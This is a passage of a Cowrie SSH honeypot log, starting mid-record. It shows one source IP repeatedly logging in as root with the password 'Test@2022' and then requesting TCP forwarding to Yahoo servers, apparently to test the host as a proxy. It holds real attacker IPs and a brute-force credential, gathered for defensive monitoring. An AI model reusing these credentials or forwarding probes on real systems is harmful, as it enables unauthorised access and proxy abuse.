cm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.462775Z","src_ip":"213.209.150.239","session":"cf036d84bb86"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.490811Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.492992Z","src_ip":"36.89.28.139","session":"7e65fde0ed59"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.697521Z","src_ip":"213.209.150.239","session":"cf036d84bb86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":4581,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:4581","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.745439Z","session":"cf036d84bb86"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.792639Z","src_ip":"213.209.150.239","session":"cf036d84bb86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18793,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18793","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.929844Z","session":"cf036d84bb86"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:21.976837Z","src_ip":"213.209.150.239","session":"cf036d84bb86"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.025019Z","src_ip":"213.209.150.239","session":"cf036d84bb86"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51874,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0d0dc3fcc7d","protocol":"ssh","message":"New connection: 213.209.150.239:51874 (1.2.3.4:22) [session: e0d0dc3fcc7d]","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.071200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.072021Z","src_ip":"213.209.150.239","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.118943Z","src_ip":"213.209.150.239","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.353361Z","src_ip":"213.209.150.239","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22006,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22006","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.401582Z","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.448827Z","src_ip":"213.209.150.239","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9045,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9045","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.585495Z","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.632588Z","src_ip":"213.209.150.239","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.680307Z","src_ip":"213.209.150.239","session":"e0d0dc3fcc7d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51972,"dst_ip":"1.2.3.4","dst_port":22,"session":"212875968be5","protocol":"ssh","message":"New connection: 213.209.150.239:51972 (1.2.3.4:22) [session: 212875968be5]","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.726593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.727566Z","src_ip":"213.209.150.239","session":"212875968be5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:22.774633Z","src_ip":"213.209.150.239","session":"212875968be5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.009448Z","src_ip":"213.209.150.239","session":"212875968be5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":31778,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31778","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.057318Z","session":"212875968be5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.104587Z","src_ip":"213.209.150.239","session":"212875968be5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9185,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9185","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.241629Z","session":"212875968be5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.289485Z","src_ip":"213.209.150.239","session":"212875968be5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.337344Z","src_ip":"213.209.150.239","session":"212875968be5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52036,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6500e326780","protocol":"ssh","message":"New connection: 213.209.150.239:52036 (1.2.3.4:22) [session: d6500e326780]","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.392928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.393611Z","src_ip":"213.209.150.239","session":"d6500e326780"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.450403Z","src_ip":"213.209.150.239","session":"d6500e326780"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.732500Z","src_ip":"213.209.150.239","session":"d6500e326780"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24298,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24298","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.789873Z","session":"d6500e326780"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:23.847168Z","src_ip":"213.209.150.239","session":"d6500e326780"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16047,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16047","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.002954Z","session":"d6500e326780"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.059570Z","src_ip":"213.209.150.239","session":"d6500e326780"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.117083Z","src_ip":"213.209.150.239","session":"d6500e326780"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52100,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd6fe0edb23c","protocol":"ssh","message":"New connection: 213.209.150.239:52100 (1.2.3.4:22) [session: dd6fe0edb23c]","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.172657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.173383Z","src_ip":"213.209.150.239","session":"dd6fe0edb23c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.229951Z","src_ip":"213.209.150.239","session":"dd6fe0edb23c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.512384Z","src_ip":"213.209.150.239","session":"dd6fe0edb23c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32030,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32030","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.569706Z","session":"dd6fe0edb23c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.626559Z","src_ip":"213.209.150.239","session":"dd6fe0edb23c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18483,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18483","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.782883Z","session":"dd6fe0edb23c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.839652Z","src_ip":"213.209.150.239","session":"dd6fe0edb23c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.896960Z","src_ip":"213.209.150.239","session":"dd6fe0edb23c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52152,"dst_ip":"1.2.3.4","dst_port":22,"session":"c35c932ff25e","protocol":"ssh","message":"New connection: 213.209.150.239:52152 (1.2.3.4:22) [session: c35c932ff25e]","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.943104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.943739Z","src_ip":"213.209.150.239","session":"c35c932ff25e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:24.991336Z","src_ip":"213.209.150.239","session":"c35c932ff25e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.226625Z","src_ip":"213.209.150.239","session":"c35c932ff25e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":9971,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9971","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.274992Z","session":"c35c932ff25e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.322233Z","src_ip":"213.209.150.239","session":"c35c932ff25e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":11111,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11111","sensor":"my-vps","timestamp":"2025-08-26T00:55:25.457556Z","session":"c35c932ff25e"}
